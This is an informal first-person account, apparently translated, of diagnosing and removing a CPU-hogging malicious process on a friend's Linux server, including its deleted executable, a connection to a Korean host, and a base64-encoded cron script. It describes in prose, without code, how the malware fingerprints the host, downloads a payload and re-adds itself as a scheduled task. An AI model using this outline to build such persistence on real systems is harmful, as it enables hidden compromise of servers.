One day in a dinner party, one of my friends told me that there was an abnormal process on his server. He was running with full CPU all the time. After a humble meal, I promised him that I would log in his server to see the specific situation.


This day is May 1, the annual labor day came, I was idle at home to do nothing to see a variety show, when the phone rang, came a WeChat message, see him to send me two pictures, suddenly aroused my curiosity.

The exe in the proc directory is pointing to a file that has been deleted. When I see this, I wonder that the process must be hidden. In a flash of wisdom, I asked my friend for the root password. Login server top command, found a strange process running, I use the kill command to kill it, after waiting for ten minutes later, found that has not been started, then I and the friend said killed, he asked me if I kill off, I said, well, he says, adding that this process will kill over time, I asked him how long will start, He didn’t know if it would start in a day or so. At this time I panicked, if it is a day to start, I still have to see tomorrow, it is really helpless. I started to watch my variety show again.

Not long after, I checked again and saw that the process had started again under a different name. It was also running dry on the CPU. At that point, while studying the process runtime file, I noticed:

This process will be connected to a server in Korea. When I visited this IP, I found that it was a normal website with no abnormal situation.

At the same time, when looking at the running directory, I found the following problems

The command to run the file is also missing, and the running directory has been deleted. Just then I got stuck in my neck and didn’t know what to do when I suddenly remembered a script that was running on a regular basis. The opening script looks like this:


Found that this script is base64 encoding encryption, on the Internet to find a decryption tool, into the decryption found that this is a script

The complete script is shown below:

Execute a temporary file and give an execution permission to delete it after the execution is completed, so I just found that the file in the execution directory is red and missing the situation

The best part is here. Here’s the key. Use splicing to compose a URL to download the virus file. Through a series of operations, first look at the local IP, then look at who I am, then look at the architecture of the machine, also look at the host name of the machine, at the same time also look at the local network card all the IP. The key is to make the network piece an MD5sum. At the end, I looked at the timing task and made a base64 string

Next is to download the script to execute and add the timing task, the interesting thing is that this script in 2017, still used. In the end, I cancelled all his permissions, changed his name, and deleted the timed task.

At this point the virus has been cleaned up.